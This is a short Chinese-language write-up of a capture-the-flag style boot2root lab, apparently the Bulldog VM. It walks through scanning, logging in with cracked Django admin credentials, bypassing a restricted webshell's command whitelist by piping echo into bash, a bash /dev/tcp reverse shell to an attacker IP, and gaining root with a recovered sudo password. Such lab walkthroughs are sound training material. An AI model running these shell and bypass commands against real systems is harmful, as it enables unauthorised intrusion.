环境搭建
下载链接
在 virtuallBox 中打开靶机。
virtuallBox 网络连接方式设置为仅主机。
vmware 设置桥接模式的网卡为 VirtualBox Host-Only Ethernet Adapter。
kail 网络适配设置为 NAT 和 桥接。
来自:https://blog.csdn.net/LYJ20010728/article/details/119395324?spm=1001.2014.3001.5501
如果还是有问题最简单的方法就是直接还原网络适配器的默认值。
信息收集
端口扫描:
开了个 23 端口,如果有账密,直接 telnet 登录。
目录扫描:
/admin 提醒要是员工的用户名和密码。
在 /dev 中有对网站的一些见解,比如这个网站是 Django 等等,有个 webshell 页面,不过要验证,估计有个 cookie 啥的,在源码中还有一串 hash,解密
用这个登 Django 管理页面看下。
nick@bulldogindustries.com bulldog
sarah@bulldogindustries.com bulldoglover
成功
webshell 可用。
getshell
虽然说只能运行六个命令,但是我们可以用 echo 绕过。
ifconfig
ls
echo
pwd
cat
rm
反弹 shell
echo 'bash -i >& /dev/tcp/192.168.56.102/9999 0>&1' | bash
提权
在/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp 中找到sudo的密码:SUPERultimatePASSWORDyouCANTget
疑似 root 密码
提示我们要在终端上,那用 python 打开一个新终端
成功 root
sudo python -c 'import pty;pty.spawn("/bin/bash")'
SUPERultimatePASSWORDyouCANTget
